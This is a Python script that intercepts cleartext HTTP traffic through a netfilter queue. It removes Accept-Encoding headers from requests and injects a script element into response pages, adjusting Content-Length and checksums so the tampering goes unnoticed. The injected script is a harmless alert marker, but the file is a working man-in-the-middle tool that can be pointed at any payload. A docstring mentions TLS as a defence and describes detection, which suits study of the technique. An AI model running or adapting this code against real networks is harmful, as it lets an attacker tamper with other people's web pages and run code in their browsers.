dochttp.py
from scapy.all import *
from colorama import init, Fore
import netfilterqueue
import re
# Set up colorama's terminal handling before any coloured output is printed.
init()

# Colour escape sequences used to highlight console status lines.
GREEN, RESET = Fore.GREEN, Fore.RESET
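def sniff_packets(iface=None):
    """Capture port-80 traffic with scapy and pass each packet to process_packet.

    Args:
        iface: Name of the interface to capture on. When falsy, no ``iface``
            argument is passed and scapy chooses the interface itself.

    Captured packets are not retained (``store=False``); they are only handed
    to the callback.
    """
    # NOTE(review): nothing in the visible file calls this function; the
    # __main__ block uses NetfilterQueue instead. process_packet calls
    # packet.get_payload() and packet.accept(), so confirm it can handle the
    # objects sniff() delivers before wiring this in.
    if iface:
        sniff(filter="port 80", prn=process_packet, iface=iface, store=False)
    else:
        sniff(filter="port 80", prn=process_packet, store=False)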
def process_packet(packet):
    """Netfilter queue callback that rewrites cleartext HTTP traffic on port 80.

    The queued payload is parsed as an IP packet with scapy. Two cases are
    handled:

    * TCP destination port 80 (request): the ``Accept-Encoding`` header line
      is removed from the decoded payload.
    * TCP source port 80 (response): a fixed ``<script>`` element is inserted
      in front of ``</body>`` and the ``Content-Length`` header value is
      increased by the length of the inserted text.

    In both cases the IP length and the IP/TCP checksums are cleared before
    the packet is serialised back into the queue entry. A payload that cannot
    be decoded as text is accepted unchanged. Every other path ends with
    ``packet.accept()``.

    Defensive context: the function only matches port 80 and only works on
    payloads it can decode as text, so traffic carried over TLS (HTTPS, with
    HSTS so clients do not fall back to HTTP) is not something it can read or
    rewrite. Observable side effects of this code are requests that reach the
    server without an ``Accept-Encoding`` header and pages that contain an
    inline script directly before ``</body>`` which the origin never sent;
    comparing a page fetched over a trusted path with what a client received
    exposes the difference.

    Args:
        packet: Queue entry supplied by NetfilterQueue; the code uses its
            ``get_payload()``, ``set_payload()`` and ``accept()`` methods.
    """
    # Parse the raw bytes from the queue into a scapy IP packet.
    spacket = IP(packet.get_payload())
    if spacket[TCP].dport == 80:
        # Client -> server direction.
        print(f"[*] Detected HTTP Request from {spacket[IP].src} to {spacket[IP].dst}")
        try:
            load = spacket[Raw].load.decode()
        except Exception as e:
            # No decodable text payload: pass the packet through untouched.
            packet.accept()
            return
        # Drop the Accept-Encoding header line; presumably so the server
        # answers uncompressed and the response body stays plain text.
        new_load = re.sub(r"Accept-Encoding:.*\r\n", "", load)
        spacket[Raw].load = new_load
        # Cleared fields are recomputed by scapy when the packet is built,
        # so the length and checksums match the modified payload.
        spacket[IP].len = None
        spacket[IP].chksum = None
        spacket[TCP].chksum = None
        packet.set_payload(bytes(spacket))
    if spacket[TCP].sport == 80:
        # Server -> client direction.
        print(f"[*] Detected HTTP Response from {spacket[IP].src} to {spacket[IP].dst}")
        try:
            load = spacket[Raw].load.decode()
        except:
            # No decodable text payload: pass the packet through untouched.
            packet.accept()
            return
        # Fixed marker script; it only raises an alert dialog in the browser.
        added_text = "<script>alert('Javascript Injected successfully!');</script>"
        added_text_length = len(added_text)
        # Place the script immediately before the closing body tag.
        load = load.replace("</body>", added_text + "</body>")
        if "Content-Length" in load:
            # Keep the declared body size in step with the longer payload.
            content_length = int(re.search(r"Content-Length: (\d+)\r\n", load).group(1))
            new_content_length = content_length + added_text_length
            load = re.sub(r"Content-Length:.*\r\n", f"Content-Length: {new_content_length}\r\n", load)
        if added_text in load:
            print(f"{GREEN}[+] Successfully injected code to {spacket[IP].dst}{RESET}")
        spacket[Raw].load = load
        # Same reset as on the request path: scapy recomputes these on build.
        spacket[IP].len = None
        spacket[IP].chksum = None
        spacket[TCP].chksum = None
        packet.set_payload(bytes(spacket))
    # Release the (possibly modified) packet back to the network stack.
    packet.accept()
if __name__ == "__main__":
    # Register process_packet as the handler for netfilter queue number 0,
    # then enter the blocking receive loop.
    nfqueue = netfilterqueue.NetfilterQueue()
    nfqueue.bind(0, process_packet)
    nfqueue.run()